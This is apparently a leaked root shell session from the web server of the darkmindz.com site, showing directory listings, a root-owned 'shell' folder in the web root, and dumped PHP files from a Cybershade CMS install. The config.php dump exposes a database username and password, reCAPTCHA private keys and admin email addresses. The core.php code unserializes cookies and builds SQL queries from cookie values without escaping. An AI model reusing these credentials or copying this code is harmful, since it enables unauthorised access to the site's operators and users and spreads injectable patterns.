$cms_root = '';
$page_name = '';
include "core/core.php";
$breadcrumb = array(
);
include "core/page_header.php";
mail("crawleruk@gmail.com", 'test', "mail() sent msg");
mailer("crawleruk@gmail.com", 'noreply@darkmindz.com', 'test', 'mailer() sent
msg');
include "core/page_footer.php";
?>root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la
total 47264
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
-rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
-rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
-rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
-rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
-rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
-rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
-rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
-rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
-rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
-rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
-rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
-rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
-rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
-rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
-rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
-rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
-rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
-rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
-rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
-rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
-rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
-rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
-rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
-rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
-rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
-rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
-rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
-rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
drwxr-xr-x 2 root root 4096 May 20 14:30 shell
-rw-r--r-- 1 romeo romeo 46488756 May 23 04:08 stress_test.txt
-rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
-rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
-rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
-rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
-rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
-rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
-rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
-rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
-rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# less ucp.php
<?php
/*======================================================================*\
| Cybershade CMS - Your CMS, Your Way |
\*======================================================================*/
define('INDEX_CHECK', 1);
define('CMS_DEBUG', 0);
define('CMS_MENU', 'ucp');
$cms_root = '';
$page_name = 'Profile';
include $cms_root."core/core.php";
if (!$_user->is_online){redirect("/".root()."index.php");}
$mode = isset($_GET['settings']) ? secureit($_GET['settings']) : 'default';
$auid = (int)isset($_GET['uid']) ? $_GET['uid'] : '';
$switch = isset($_GET['action']) ? $_GET['action'] : '';
$uid = $config['global']['user']['id'];
if((int)isset($_GET['uid']) &&
$_user->check_permissions($config['global']['user
']['id'], ($mode!='avatar' ? GMOD : MOD)) ){
$uid = (int)$_GET['uid'];
}else{
$uid = $config['global']['user']['id'];
ucp.php root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# cd core
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# ls -al
total 164
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 .
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
-rw-r--r-- 1 romeo romeo 731 Jan 13 07:34 admin.js
-rw-r--r-- 1 romeo romeo 27395 Feb 18 09:08 base_functions.php
-rw-r--r-- 1 romeo romeo 9098 Feb 21 10:50 bbcode_tags.php
-rw-r--r-- 1 romeo romeo 2816 Feb 1 08:55 cacher.php
drwxr-xr-x 4 romeo romeo 4096 Feb 10 13:29 classes
-rw-r--r-- 1 romeo romeo 1436 Feb 2 08:33 cli.php
-rw-r--r-- 1 romeo romeo 2848 Feb 8 08:46 config.php
-rw-r--r-- 1 romeo romeo 23810 Apr 19 16:45 core.php
-rw-r--r-- 1 romeo romeo 4518 Feb 1 08:55 cron.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 err
-rw-r--r-- 1 romeo romeo 236 Feb 2 08:33 force_user.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 functions
-rw-r--r-- 1 romeo romeo 1181 Feb 2 08:33 key.php
-rw-r--r-- 1 romeo romeo 6903 Feb 2 08:33 mailer.php
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 mint
-rw-r--r-- 1 romeo romeo 3054 Feb 14 06:17 page_footer.php
-rw-r--r-- 1 romeo romeo 5935 Feb 14 06:17 page_header.php
-rw-r--r-- 1 romeo romeo 9762 Feb 2 08:33 recaptchalib.php
-rw-r--r-- 1 romeo romeo 6658 Apr 26 07:51 security.php
-rw-r--r-- 1 romeo romeo 2021 Feb 2 08:33 usertracker.php
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# cat config.php
<?php
//Cybershade.Org
//Database Stuff
$config['db']['host'] = 'localhost';
$config['db']['username'] = 'romeo_romeo';
$config['db']['password'] = 'swU55ath';
$config['db']['database'] = 'romeo_DMZ_CS';
$config['db']['prefix'] = 'dmz_';
$config['db']['shrfix'] = 'shr_'; //the prefix
for the shared tables
$config['db']['ckefix'] = 'CMS_'; //the cookie prefix
$config['db']['ckeauth'] = '0.7.0'; //the cookie auth key //this
is also a good way to invalidate the autologins on cms update
$config['site']['working_dir'] = '';
//config vars for if we loose the DB
$config['cms']['name'] = 'DarkMindZ';
$config['cms']['version'] = '_DDoS';
$config['cms']['debug'] = "0";
$config['site']['title'] = 'CyberShade CMS';
$config['site']['theme'] = 'cs';
$config['site']['language'] = 'en';
$config['site']['keywords'] = '';
$config['site']['description'] = '';
$config['site']['max_login_tries'] = "5";
$config['site']['time'] = 'jS F h:ia';
$config['site']['template_override'] = "1";
$config['site']['auto_login'] = "1";
$config['site']['ips_max_before_ban'] = "5";
$config['site']['hourly_time'] = 3600; //1 Hour
$config['site']['daily_time'] = (3600*24); //1 Day
$config['site']['weekly_time'] = (3600*24*7); //1 Week
$config['site']['default_module'] = 'core';
$config['site']['closed'] = "0";
$config['site']['admin_email'] = 'romeo.haxxor@gmail.com';
$config['site']['usernamechange'] = "0";
$config['site']['fc_update'] = "1220620615";
$config['site']['paginate'] = "8";
$config['site']['news_cat'] = "2";
$config['site']['captcha_pub'] =
'6Lf-qAQAAAAAANqWAU4YSnkwdy0M2mClwO3IOhTe';
$config['site']['captcha_priv'] =
'6Lf-qAQAAAAAAOLgdFyr4dAhaDnnx2Nic0Wlpf6Q ';
$config['site']['announcement'] = 'No Current Announcements, This may
be because the Database has gone down.';
$config['rss']['global_limit'] = "15";
$config['site']['max_whitelist'] = "5";
$config['movemod']['move_enabled'] = "0";
$config['site']['quick_replys'] = "0";
$config['site']['users_online'] = "0";
$config['site']['guests_online'] = "0";
//Statistics shit fort the same reason (Only used when the DB is inactive,
setting it to time() + 9999999 means the cron will never be run)
$config['statistics']['hourly_cron'] = "9999999999999";
$config['statistics']['daily_cron'] = "9999999999999";
$config['statistics']['weekly_cron'] = "9999999999999";
$config['statistics']['total_members'] = 'N/A, (DDoS)';
$config['statistics']['last_user_user'] = 'N/A, (DDoS)';
$config['statistics']['last_user_id'] = 'N/A, (DDoS)';
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# cat core.php
<?php
/*======================================================================*\
| Cybershade CMS - Your CMS, Your Way. |
\*======================================================================*/
if(!defined('INDEX_CHECK')){die("INDEX_CHECK not defined.");}
error_reporting ($_SERVER['HTTP_HOST']=='localhost' ?(E_ALL) : (0));
define('SMODE', ($_SERVER['HTTP_HOST']=='localhost' ? 0 : 1));
//this is to start the generation timer off
$gen_time = microtime();
//Include the session stuff
if(!SMODE) require($cms_root."core/classes/class.session.php");
if(SMODE) require($cms_root."core/classes/classes.php");
$_sess = new session;
//Set the headers
header("Cache-control: private");
header("Content-Type: text/html; charset=utf-8");
//ob_start("ob_gzhandler");
/////////////////////////////////////////////////////////////////////////////
//--Include the core CMS files needed -------------------------------------//
/////////////////////////////////////////////////////////////////////////////
//The config files
require($cms_root."core/config.php");
/*this is the ultimate cache-er xD, k so basically u got
* the var below which "allows" the static cacher through
*/
#$allow = true;
//this little switch decided what should be auto cache'd
/*switch(CMS_MENU){
case 'forum': $allow = false; break;
case 'admin': $allow = false; break;
case 'ucp': $allow = false; break;
case 'login': $allow = false; break;
case 'main': $allow = false; break;
case 'pm': $allow = false; break;
default: $allow = true; break;
}
if($allow){
// Get the modification date of this PHP file
$timestamps = array(@getlastmod());
// The latest of these modification dates is our real Last-Modified date
$timestamp = max($timestamps);
// Note that this is not a RFC 822 date (the tz is always GMT)
$tsstring = gmdate("D, d M Y H:i:s ", $timestamp) . "GMT";
// Check if the client has the same page cached
if (isset($_SERVER["HTTP_IF_MODIFIED_SINCE"]) &&
($_SERVER["HTTP_IF_MODIFIED_SINCE"] == $tsstring)) {
header("HTTP/1.1 304 Not Modified");
exit();
}
// Inform the user what is our last modification date
else {
header("Last-Modified: " . $tsstring);
}
}*/
//The class files
require($cms_root."core/classes/class.sql.php");
if(!SMODE)require($cms_root."core/classes/class.login.php");
if(!SMODE)require($cms_root."core/classes/class.user.php");
if(!SMODE)require($cms_root."core/classes/class.form.php");
if(!SMODE)require($cms_root."core/classes/class.time.php");
require($cms_root."core/classes/class.nbbc.php");
require($cms_root."core/classes/class.tpl.php");
if(!SMODE)require($cms_root."core/classes/class.cache.php");
require($cms_root."core/classes/class.geshi.php");
//The base functions
require($cms_root."core/base_functions.php");
/////////////////////////////////////////////////////////////////////////////
//--Sort out the cached config stuff---------------------------------------//
/////////////////////////////////////////////////////////////////////////////
$config_db = array();
//check see if the config file exists, if not then just create a blank config
variable
if(file_exists($cms_root."cache/cache_config.php")){ include
$cms_root."cache/cache_config.php"; }
//If the config_db is not null, cached.. then use it.
if($config_db !== NULL){
foreach($config_db as $array){
$config[$array['array']][$array['var']] = $array['value'];
}
unset($array);
}
if(isset($_GET['_site'])){
$a=(isset($_GET['_site']) ? $_GET['_site'] :
(isset($_SESSION['site']['mode']) ? $_SESSION['site']['mode'] :
$config['db']['prefix']));
switch($a){
case 'dmz':
$_SESSION['site']['mode'] = 'dmz_';
break;
case 'cs':
$_SESSION['site']['mode'] = 'cs_';
break;
default:
}
}
if(isset($_SESSION['site']['mode']))
$config['db']['prefix'] = $_SESSION['site']['mode'];
/////////////////////////////////////////////////////////////////////////////
//--Define new instances of required classes-------------------------------//
/////////////////////////////////////////////////////////////////////////////
//start the sql
$_sql = new sql(true);
$_sql->config = $config;
if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
//Open the session stuff
$_sess->sql = $_sql;
$_sess->config = $config;
//start the form class
$_form = new form;
//start the user class
$_user = new user;
$_user->config = $config;
$_user->sql = $_sql;
//start the login
$_login = new login((isset($config['site']['autologin']) ? true : false));
$_login->config = $config;
$_login->sql = $_sql;
$_login->form = $_form;
$_login->sess = $_sess;
$_login->user = $_user;
$_user->login = $_login;
//require($cms_root."core/key.php");
//start the time class
$_time = new time;
$_time->config = $config;
//start the bbcode class
$_bbcode = new bbcode;
$_bbcode->SetDebug(true);
$_bbcode->SetDetectURLs(false);
$_bbcode->SetURLPattern('<a href="{$url/h}">{$text/h} <img
src="/'.root().'images/external.gif" width="11" height="11" alt="External Link"
/></a>');
$_bbcode->ClearSmileys();
$_bbcode->SetSmileyDir('/'.root().'images/smilies');
include($cms_root."core/bbcode_tags.php");
$_bbcode->user = $_user;
$_user->bbcode = $_bbcode;
//start the cache && template classes
$_cache_path = $cms_root."cache/";
if (is_dir($_cache_path)){ @chmod($_cache_path, 0777); }
$_cache_ = (is_writable($_cache_path) ? true : false);
$_cache = new Cache($_sql, $_cache_path, $_cache_);
$_cache->config = $config['db'];
//regenerate the site cache
if($config!==NULL || !empty($config)){
$config_db = $_cache->generate_cache("config_db", "cache_config.php",
"SELECT * FROM ".$config['db']['prefix']."config");
foreach($config_db as $array){
$config[$array['array']][$array['var']] = $array['value'];
}
unset($array,$config_db);
}
//start the template class
$_template = new template('.', $_cache_, $_cache_path."files/");
$_template->cms_root = $cms_root;
$_template->user = $_user;
$_login->template = $_template;
//start the language class
$_language = $config['site']['language'];
if(isset($_SESSION['user']['language'])){
if(file_exists($cms_root."language/".$_SESSION['user']['language']."/main.php")
){
$_language = $_SESSION['user']['language'];
}
}
require($cms_root."language/".$_language."/main.php");
$_time->cur_lang = $_language;
//run the lang pass function on the language vars AFTER we included the base
functions.
foreach($_lang as $key => $value){
if(!is_array($_lang[$key])){
$_lang[$key] = lang_pass($_lang[$key]);
}
}
$_time->lang = $_lang;
$_bbcode->lang = $_lang;
$_login->lang = $_lang;
//Include the security files.. recaptchalib maybe add into the login class
require($cms_root."core/security.php");
require($cms_root."core/classes/class.captcha.php");
$_captcha = new Captcha($config['site']['captcha_pub'],
$config['site']['captcha_priv']);
$_cms_root = $cms_root;
//Include the mailer
require($cms_root."core/mailer.php");
$cms_root = $_cms_root;
/////////////////////////////////////////////////////////////////////////////
//--Continue with the configuration----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
define('ADMIN', 9);
define('DEV', 8);
define('GMOD', 7);
define('MOD', 5);
define('USER', 1);
define('BANNED', 0);
//add some stuff to the config
//generate guest defaults
$guest['user']['id'] = '0';
$guest['user']['username'] = 'Guest';
$guest['user']['theme'] = $config['site']['theme'];
$guest['user']['userkey'] = isset($_SESSION['user']['userkey']) ?
$_SESSION['user']['userkey'] : NULL;
//generate user stuff
$config['global']['user'] = (isset($_SESSION['user']['id']) ? $_SESSION['user']
: $guest['user']);
$config['global']['ip'] = getIP();
$config['global']['useragent'] = secureit(isset($_SERVER['HTTP_USER_AGENT']) ?
$_SERVER['HTTP_USER_AGENT'] : NULL);
$config['site']['guests_online'] = (isset($guests_online) &&
is_numeric($guests_online) ? $guests_online : 0);
$config['site']['users_online'] = (isset($_users_online) &&
is_numeric($_users_online) ? $_users_online : 0);
$_user->is_online = $_login->is_online = isset($_SESSION['user']['id']) ? true
: false;
#if(!isset($_SESSION['user']['id'])){$_SESSION['user'] = $guest['user'];}
$tpl = $config['site']['theme'];
if($config['site']['template_override']){
if(!is_dir($cms_root.'template/'.$tpl.'/')){$tpl = 'vone';}
}else{
if(isset($config['global']['user']['template']) &&
is_dir($cms_root."template/".$config['global']['user']['template']."/")){
$tpl = $config['global']['user']['template'];
}
}
$_template->config = $config;
$_template->tpl = $tpl;
//None of these should be defined as vars as they can be over writtin.. They
are defines
$_module = (is_string(isset($_GET['module'])) ? $_GET['module'] :
$config['site']['default_module']);
$_user_temp = $cms_root."template/".$tpl."/";
$_module_temp = $cms_root."modules/".$_module."/template/";
if(isset($_SESSION['login']) && isset($_SESSION['user']['id'])){
unset($_SESSION['login']);
}
$_template->set_rootdir($cms_root);
define('IS_MOD', $_user->check_permissions($config['global']['user']['id'],
MOD));
define('IS_GMOD', $_user->check_permissions($config['global']['user']['id'],
GMOD));
define('IS_DEV', $_user->check_permissions($config['global']['user']['id'],
DEV));
define('IS_ADMIN', $_user->check_permissions($config['global']['user']['id'],
ADMIN));
/////////////////////////////////////////////////////////////////////////////
//--Grab the neccesarry cache files----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
//this defines which of the cache files to include
//require($cms_root.'core/cacher.php');
/////////////////////////////////////////////////////////////////////////////
//--Cacher.php-------------------------------------------------------------//
/////////////////////////////////////////////////////////////////////////////
$cache_gen = array('statistics', 'menu', 'minimenu', 'groups', 'bans',
'user_permissions', NULL);#'badwords', 'affiliates',
$x=0;
include($cms_root."cache/cache.php");
while($var = $cache_gen[$x]){
if($var != ''){
$gen = NULL;
eval('$gen = $'.$var.'_db;');
/*if(file_exists($cms_root.'cache/cache_'.$var.'.php')){
include($cms_root."cache/cache_".$var.".php");
eval('$gen = $'.$var.'_db;');
}*/
if ($gen !== NULL || !empty($gen)){
foreach($gen as $k => $v){
$config[$var][$k] = $v;
}
}else{
//regenerate the cache if not avalible
switch($var){
case 'config':
$config[$var] = $_cache->generate_cache("config_db",
"cache_config.php", "SELECT * FROM ".$config['db']['prefix']."config", NNUM);
break;
case 'minimenu':
$config[$var] = $_cache->generate_cache("minimenu_db",
"cache_minimenu.php", "SELECT * FROM ".$config['db']['prefix']."mmenus ORDER BY
disporder ASC");
break;
case 'menu':
$config[$var] = $_cache->generate_cache("menu_db",
"cache_menu.php", "SELECT * FROM ".$config['db']['prefix']."menus ORDER BY id
ASC", NNUM);
:
break;
case 'statistics':
$config[$var] = $_cache->generate_statistics_cache();
break;
case 'groups':
$config[$var] = $_cache->generate_cache("groups_db",
"cache_groups.php", "SELECT * FROM ".$config['db']['prefix']."groups ORDER BY
rank DESC");
break;
case 'bans':
$config[$var] = $_cache->generate_cache("bans_db",
"cache_bans.php", "SELECT * FROM ".$config['db']['shrfix']."banned");
break;
//case 'affiliates':
// $config[$var] =
$_cache->generate_cache("affiliates_db", "cache_affiliates.php", "SELECT * FROM
".$config['db']['prefix']."affiliates");
//break;
//case 'module_permissions':
// $config[$var] =
$_cache->generate_cache("module_permissions_db",
"cache_module_permissions.php", "SELECT * FROM
".$config['db']['prefix']."module_permissions");
//break;
case 'user_permissions':
$config[$var] = $_cache->generate_upermissions_cache();
break;
}
}
}
$x++;
}
/////////////////////////////////////////////////////////////////////////////
//--Cacher.php-------------------------------------------------------------//
/////////////////////////////////////////////////////////////////////////////
$_user->groups = $config['groups'];
//$_user->module_permissions = $config['module_permissions'];
$_user->permissions = $config['user_permissions'];
/////////////////////////////////////////////////////////////////////////////
//--Cron - This will sort the majority of the cache and--------------------//
//---------db problems out for us------------------------------------------//
/////////////////////////////////////////////////////////////////////////////
//include($cms_root.'core/cron.php');
/////////////////////////////////////////////////////////////////////////////
//--Cron.php---------------------------------------------------------------//
/////////////////////////////////////////////////////////////////////////////
if(!defined('NO_DB')){
$hourly_cron = FALSE;
if(isset($config['site']['hourly_time'])){
if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
$_sql->updateRow("statistics", array('value' => time()),
"variable = 'hourly_cron'");
$hourly_cron = TRUE;
} else {
if($config['site']['hourly_time'] == 0){
$hourly_cron = TRUE;
}else{
if((time() - $config['site']['hourly_time']) >
$config['statistics']['hourly_cron']){
$_sql->updateRow("statistics", array('value' =>
time()), "variable = 'hourly_cron'");
$hourly_cron = TRUE;
}
:
}
}
}
$daily_cron = FALSE;
if(isset($config['site']['daily_time'])){
if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
$_sql->updateRow("statistics", array('value' => time()),
"variable = 'daily_cron'");
$daily_cron = TRUE;
} else {
if($config['site']['daily_time'] == 0){
$daily_cron = TRUE;
}else{
if((time() - $config['site']['daily_time']) >
$config['statistics']['daily_cron']){
$_sql->updateRow("statistics", array('value' =>
time()), "variable = 'daily_cron'");
$daily_cron = TRUE;
}
}
}
}
$weekly_cron = FALSE;
if(isset($config['site']['weekly_time'])){
if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
$_sql->updateRow("statistics", array('value' => time()),
"variable = 'weekly_cron'");
$weekly_cron = TRUE;
} else {
if($config['site']['weekly_time'] == 0){
$weekly_cron = TRUE;
}else{
if((time() - $config['site']['weekly_time']) >
$config['statistics']['weekly_cron']){
$_sql->updateRow("statistics", array('value' =>
time()), "variable = 'weekly_cron'");
$weekly_cron = TRUE;
}
}
}
}
}
$stat_cache = false;
if(!defined('NO_DB')){
if($hourly_cron){
$_sql->record_message('Hourly CRON is running');
//delete users from sql that are inactive and set users offline
that are inactive too
$_sql->query("UPDATE shr_users
SET timestamp = ( SELECT cs_online.timestamp FROM cs_online WHERE
cs_online.uid = shr_users.id)
WHERE EXISTS
( SELECT cs_online.timestamp FROM cs_online WHERE cs_online.uid =
shr_users.id)");
$_sql->deleteRow('online', "login_time <
".$_time->mod_time(time(), 0, 20, 0, 'TAKE')." AND timestamp <
".$_time->mod_time(time(), 0, 20, 0, 'TAKE'));
$_sql->query('DELETE FROM `shr_banned` WHERE `user_ip` LIKE
"66.249%"');
$_cache->generate_statistics_cache();
$stat_cache = true;
}
if($daily_cron){
$_sql->record_message('Daily CRON is running');
//update caches
if(!$stat_cache){
$_cache->generate_statistics_cache();
$stat_cache = true;
:
}
if($config['forum']['auto_lock']){
//Auto Lock Thread Timer
$ex = $_time->mk_time(time()-$config['forum']['auto_lock_cron'],
'', 1);
$_sql->updateRow('forum_topics', array('locked'=>1), "last_poster
<= $ex", 1);
}
$_sql->query("DELETE FROM ".$config['db']['shrfix']."pastebin WHERE
expire < ".time()."");
$_cache->generate_upermissions_cache();
$_cache->generate_cache("minimenu_db", "cache_minimenu.php", "SELECT *
FROM ".$config['db']['prefix']."mmenus ORDER BY disporder ASC");
$_cache->generate_cache("menu_db", "cache_menu.php", "SELECT *
FROM ".$config['db']['prefix']."menus ORDER BY id ASC", NNUM);
//$_cache->generate_cache("module_permissions_db",
"cache_module_permissions.php", "SELECT * FROM
".$config['db']['prefix']."module_permissions");
}
if($weekly_cron){
$_sql->record_message('Weekly CRON is running');
if(!$stat_cache){
$_cache->generate_statistics_cache();
$stat_cache = true;
}
$_cache->generate_cache("config_db", "cache_config.php", "SELECT * FROM
".$config['db']['prefix']."config");
$_cache->generate_cache("groups_db", "cache_groups.php", "SELECT *
FROM ".$config['db']['prefix']."groups ORDER BY rank DESC");
//Optimise all of the tables in the DB
$alltables = $_sql->getTable("SHOW TABLES");
$tables = '';
$counter = count($alltables);
$x = 0;
$add = ", ";
foreach($alltables as $table){
foreach ($table as $tablename){
if($x == ($counter-1)){
$add = '';
}
$tables .= "`$tablename`$add";
$x++;
}
}
$_sql->query("OPTIMIZE TABLE $tables");
$_sql->updateRow("statistics", array('value' => time()), "variable
= 'weekly_time'", FALSE);
}
if($weekly_cron || $daily_cron || $hourly_cron){
define('FILE_MERGE', 1);
include($cms_root.'merge.php');
}
}
/////////////////////////////////////////////////////////////////////////////
//--Cron.php---------------------------------------------------------------//
/////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////
//--Check weather the site is closed---------------------------------------//
/////////////////////////////////////////////////////////////////////////////
if (($config['site']['closed'] == 1) && (!defined("CMS_CLOSED"))){
if (!$_user->check_permissions($config['global']['user']['id'],
ADMIN)){
die(die_error(4));
:
}
}
/////////////////////////////////////////////////////////////////////////////
//--Check weather a user is banned-----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
/**
if ($config['bans'] != NULL){
foreach ($config['bans'] as $bans){
if ($bans['user_ip'] == $config['global']['ip']){
die(die_error($bans['die']));
}
}
}
**/
/////////////////////////////////////////////////////////////////////////////
//--Sort out the guests & users online stuff-------------------------------//
/////////////////////////////////////////////////////////////////////////////
//include($cms_root.'core/usertracker.php');
/////////////////////////////////////////////////////////////////////////////
//--UserTracker.php--------------------------------------------------------//
/////////////////////////////////////////////////////////////////////////////
if(!defined('NO_DB') && !defined('NO_LOG')){
if(!isset($_SESSION['user']['userkey'])){
//cookie check
if(!$_user->is_online){
if(isset($_COOKIE[$config['db']['ckefix'].'login']) &&
!empty($_COOKIE[$config['db']['ckefix'].'login'])){
$cookie = unserialize($_COOKIE[$config['db']['ckefix'].'login']);
if(isset($cookie[1]) && (int)isset($cookie[0])){
if($cookie[1] ==
$_login->mk_passwd($_SERVER['HTTP_USER_AGENT'], $config['db']['ckeauth'])){
if($config['login']['autologinIpRestriction']) $aq
= " AND user_ip = '".getIP()."'";
$query = $_sql->getTable("SELECT uid FROM
".$config['db']['shrfix']."userkeys WHERE uid = '".$cookie[0]."' AND user_agent
= '".$cookie[1]."'".(isset($aq) ? $aq : '')." LIMIT 1;");
if (count($query) == 1){
$user = $_sql->getTable("SELECT timestamp
FROM ".$config['db']['shrfix']."users WHERE id = '".$cookie[0]."' LIMIT 1");
if($user!==NULL){
$user = $user[0];
$_sess->set_sessions($cookie[0]);
$_SESSION['user']['last_visit']
= $user['timestamp'];
$_user->new_user($cookie[0], 'alogin');
if($_user->get_new_threads($_SESSION['user']['last_visit']))
setNotification('We have just updated your
forum icons to reflect new posts.', 'Forum Icons Updated', false,
$_SESSION['user']['id']);
$config['global']['user']['id'] =
$_SESSION['user']['id'];
}
}else{//if count query == 1
setcookie($config['db']['ckefix']."login",
null, time() - 31536000); //set cookie to remember me
unset($_COOKIE[$config['db']['ckefix']."login"]);
}
}else{ //if cookie == http user agent
setcookie($config['db']['ckefix']."login",
null, time() - 31536000); //set cookie to remember me
unset($_COOKIE[$config['db']['ckefix']."login"]);
}
}else{//if cookie info == valid
setcookie($config['db']['ckefix']."login", null, time()
- 31536000); //set cookie to remember me
unset($_COOKIE[$config['db']['ckefix']."login"]);
}
redirect($_SERVER["PHP_SELF"]);
}
}
$_user->new_user($config['global']['user']['id']);
}else{
$return = $_user->update_location();
if($return == 0){
$_user->new_user($config['global']['user']['id']);
}
}
}
/////////////////////////////////////////////////////////////////////////////
//--UserTracker.php--------------------------------------------------------//
/////////////////////////////////////////////////////////////////////////////
/**
* Thanks to Jesus for this baby, this will add the level of sanitation
required for the diffrent data types
*/
function secureit($string, $type=''){
switch($type){
case 'post':
$string = mysql_real_escape_string($string);
break;
default:
$string = mysql_real_escape_string($string);
$string = htmlentities($string);
$string = stripslashes($string);
$string = strip_tags($string);
break;
}
return $string;
}
if (isset($_GET['code']) &&
$_user->check_permissions($config['global']['user']['id'], DEV)) {
$explode = explode('/', $_SERVER['PHP_SELF']);
die(highlight_file($explode[count($explode)-1], 1));
}
?>root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# less Gre.php
<?php
/*======================================================================*\
| Cybershade CMS - Your CMS, Your Way. |
\*======================================================================*/
if(!defined('INDEX_CHECK')){die("INDEX_CHECK not defined.");}
error_reporting ($_SERVER['HTTP_HOST']=='localhost' ?(E_ALL) : (0));
define('SMODE', ($_SERVER['HTTP_HOST']=='localhost' ? 0 : 1));
//this is to start the generation timer off
$gen_time = microtime();
//Include the session stuff
if(!SMODE) require($cms_root."core/classes/class.session.php");
if(SMODE) require($cms_root."core/classes/classes.php");
$_sess = new session;
//Set the headers
header("Cache-control: private");
header("Content-Type: text/html; charset=utf-8");
//ob_start("ob_gzhandler");
/////////////////////////////////////////////////////////////////////////////
//--Include the core CMS files needed -------------------------------------//
core.php
/////////////////////////////////////////////////////////////////////////////
:
://The config files
:require($cms_root."core/config.php");
:
:/*this is the ultimate cache-er xD, k so basically u got
: * the var below which "allows" the static cacher through
: */
:
:#$allow = true;
:
://this little switch decided what should be auto cache'd
:/*switch(CMS_MENU){
: case 'forum': $allow = false; break;
: case 'admin': $allow = false; break;
: case 'ucp': $allow = false; break;
: case 'login': $allow = false; break;
: case 'main': $allow = false; break;
: case 'pm': $allow = false; break;
: default: $allow = true; break;
:}
:
:if($allow){
: // Get the modification date of this PHP file
: $timestamps = array(@getlastmod());
:
: // The latest of these modification dates is our real Last-Modified date
: $timestamp = max($timestamps);
:
: // Note that this is not a RFC 822 date (the tz is always GMT)
: $tsstring = gmdate("D, d M Y H:i:s ", $timestamp) . "GMT";
:
: // Check if the client has the same page cached
